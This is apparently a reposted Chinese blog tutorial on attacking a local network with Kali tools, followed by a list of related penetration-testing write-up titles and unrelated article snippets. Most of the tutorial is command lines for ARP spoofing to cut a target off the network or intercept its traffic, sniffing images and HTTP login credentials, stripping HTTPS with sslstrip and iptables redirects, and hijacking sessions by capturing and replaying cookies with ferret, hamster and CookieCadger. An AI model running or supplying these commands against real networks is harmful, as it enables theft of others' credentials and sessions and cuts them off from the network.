局域网-断网&劫持(kali)

 

1.查看局域网中的主机

fping –asg 192.168.1.0/24

2.断网

arpspoof -i wlan0 -t 192.168.100 192.168.1.1

(arpspoof  -i 网卡 -t 目标IP 网关)

3.流量劫持

echo 1 >/proc/sys/net/ipv4/ip_forward

(echo空格1空格>)

arpspoof -i wlan0 -t 192.168.100 192.168.1.1

4.图片嗅探

(1)方法1(实验不成功)

echo 1 >/proc/sys/net/ipv4/ip_forward

arpspoof -i wlan0 -t 192.168.100 192.168.1.1

driftnet -i wlan0

(原因分析:可能丢包原因吧)

(2)方法2(成功)

sudo ettercap -i wlan0  -T -M arp:remote /192.168.1.253//192.168.1.100/

driftnet -i wlan0

(图片文件夹:/tmp/driftnet)

Ubuntu下可以安装工具:

sudo apt-get install  ettercap-text-only

sudo apt-get install driftnet

5.http登录账号密码嗅探

echo 1 >/proc/sys/net/ipv4/ip_forward

arpspoof -i wlan0 -t 192.168.100 192.168.1.1

ettercap -Tq -i wlan0

(信息太庞杂,可以使用 ettercap -Tq -i wlan0 >test方便查找)

6.https登录账号密码嗅探

vim /etc/ettercap.conf

# if you use iptables:

#redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

#redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

修改为

# if you use iptables:

redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

sslstrip -a -f -k

echo 1 >/proc/sys/net/ipv4/ip_forward

arpspoof -i wlan0 -t 192.168.100 192.168.1.1

ettercap -Tq -i wlan0

7.会话劫持

(1)方法1

arpspoof

wireshark        -->抓包

ferret         --。重新生成抓包后的文件

hamster       -- > 重放流量

$echo 1 >/proc/sys/net/ipv4/ip_forward

$arpspoof -i wlan0 -t 192.168.100 192.168.1.1

$wireshark

wireshark 保存为.pcap文件

$ferret -r cookie.pcap

将生成的txt文件放到用户目录下

$hamster

配置代理

访问127.0.0.1:1234(上一步的代理)

(2)方法2

$echo 1 >/proc/sys/net/ipv4/ip_forward

$arpspoof -i wlan0 -t 192.168.100 192.168.1.1

$ferret -i wlan0

$hamster

(3)方法3

$echo 1 >/proc/sys/net/ipv4/ip_forward

$arpspoof -i wlan0 -t 192.168.100 192.168.1.1

CookieCadger-1.08.jar

此文章转自:https://www.cnblogs.com/yaolei/p/4763334.html

kali渗透的更多相关文章

  1. kali渗透测试之缓冲区溢出实例-windows,POP3,SLmail

    kali渗透测试之缓冲区溢出实例-windows,POP3,SLmail 相关链接:https://www.bbsmax.com/A/xl569l20Jr/ http://4hou.win/wordp ...

  2. kali渗透综合靶机(一)--Lazysysadmin靶机

    kali渗透综合靶机(一)--Lazysysadmin靶机 Lazysysadmin靶机百度云下载链接:https://pan.baidu.com/s/1pTg38wf3oWQlKNUaT-s7qQ提 ...

  3. kali渗透综合靶机(十八)--FourAndSix2靶机

    kali渗透综合靶机(十八)--FourAndSix2靶机 靶机下载地址:https://download.vulnhub.com/fourandsix/FourAndSix2.ova 一.主机发现 ...

  4. kali渗透综合靶机(十七)--HackInOS靶机

    kali渗透综合靶机(十七)--HackInOS靶机 靶机下载地址:https://www.vulnhub.com/hackinos/HackInOS.ova 一.主机发现 1.netdiscover ...

  5. kali渗透综合靶机(十六)--evilscience靶机

    kali渗透综合靶机(十六)--evilscience靶机 一.主机发现 1.netdiscover -i eth0 -r 192.168.10.0/24 二.端口扫描 1. masscan --ra ...

  6. kali渗透综合靶机(十五)--Breach-1.0靶机

    kali渗透综合靶机(十五)--Breach-1.0靶机 靶机下载地址:https://download.vulnhub.com/breach/Breach-1.0.zip 一.主机发现 1.netd ...

  7. kali渗透综合靶机(十四)--g0rmint靶机

    kali渗透综合靶机(十四)--g0rmint靶机 靶机下载地址:https://www.vulnhub.com/entry/g0rmint-1,214/ 一.主机发现 1.netdiscover - ...

  8. kali渗透综合靶机(十三)--Dina 1.0靶机

    kali渗透综合靶机(十三)--Dina 1.0靶机 一.主机发现 1.netdiscover -i eth0 -r 192.168.10.0/24 二.端口扫描 1. masscan --rate= ...

  9. kali渗透综合靶机(十二)--SickOs1.2靶机

    kali渗透综合靶机(十二)--SickOs1.2靶机 靶机下载地址:https://www.vulnhub.com/entry/sickos-12,144/ 一.主机发现 1.netdiscover ...

  10. kali渗透综合靶机(十一)--BSides-Vancouver靶机

    kali渗透综合靶机(十一)--BSides-Vancouver靶机 靶机下载地址:https://pan.baidu.com/s/1s2ajnWHNVS_NZfnAjGpEvw 一.主机发现 1.n ...

随机推荐

  1. angular 监听离开页面执行相关操作

    $scope.$on("$destroy", function() { //...})

  2. G++命令

    gcc and g++分别是gnu的c & c++编译器. 从源代码到可执行文件的四步 gcc/g++在执行编译工作的时候,总共需要4步 1.预处理,生成.i的文件,用到预处理器cpp.这一步 ...

  3. APS中生产计划排程模块的基本原理

    高级计划系统(APS)作为ERP和MES的补充,用于协调物流.开发瓶颈资源和保证交货日期. APS包括需求和供应计划.运输和生产计划排程等各种供应链计划模块,本文主要介绍APS中生产计划排程模块的基本 ...

  4. maven 学习---Maven本地资源库

    Maven的本地资源库是用来存储所有项目的依赖关系(插件jar和其他文件,这些文件被Maven下载)到本地文件夹. 很简单,当你建立一个Maven项目,所有相关文件将被存储在你的Maven本地仓库. ...

  5. android studio学习----添加项目库

    Library Project(库项目) compile project(':library') 引用名称为 library 的 module .需要注意的是,被引用的 module 需要在 {@pr ...

  6. NIO的整体认识

    目录 1.Java NIO简介 2.java NIO和IO的主要区别 3.缓冲区buffer和通道channel 3.1.缓冲区buffer 3.2.channel 4.文件通道fileChannel ...

  7. Shell 编程 免交互 expect

    本篇主要写一些shell脚本免交互expect的使用. 概述 Expect是建立在tcl基础上的一个工具,Expect 是用来进行自动化控制和测试的工具.主要解决shell脚本中不可交互的问题. 安装 ...

  8. Linux小知识:CentOS使用Google-BBR加速网络

    准备一台centos的服务器查看系统内核:rpm -qa | grep kernel这里需要Linux内核在4.9 RC版本以上,如果版本不是请继续下面操作 访问https://elrepo.org/ ...

  9. Listary 文件操作神器

    文档简介 Listary 官方文档(中文版):https://zhuanlan.zhihu.com/p/24897629 视频介绍:https://v.youku.com/v_show/id_XNTY ...

  10. 第08节-开源蓝牙协议栈BTStack数据处理

    本篇博客根据韦东山的视频整理所得. 在上篇博客,通过阅读BTStack的源码,大体了解了其框架,对于任何一个BTStack的应用程序都有一个main函数,这个main函数是统一的.这个main函数做了 ...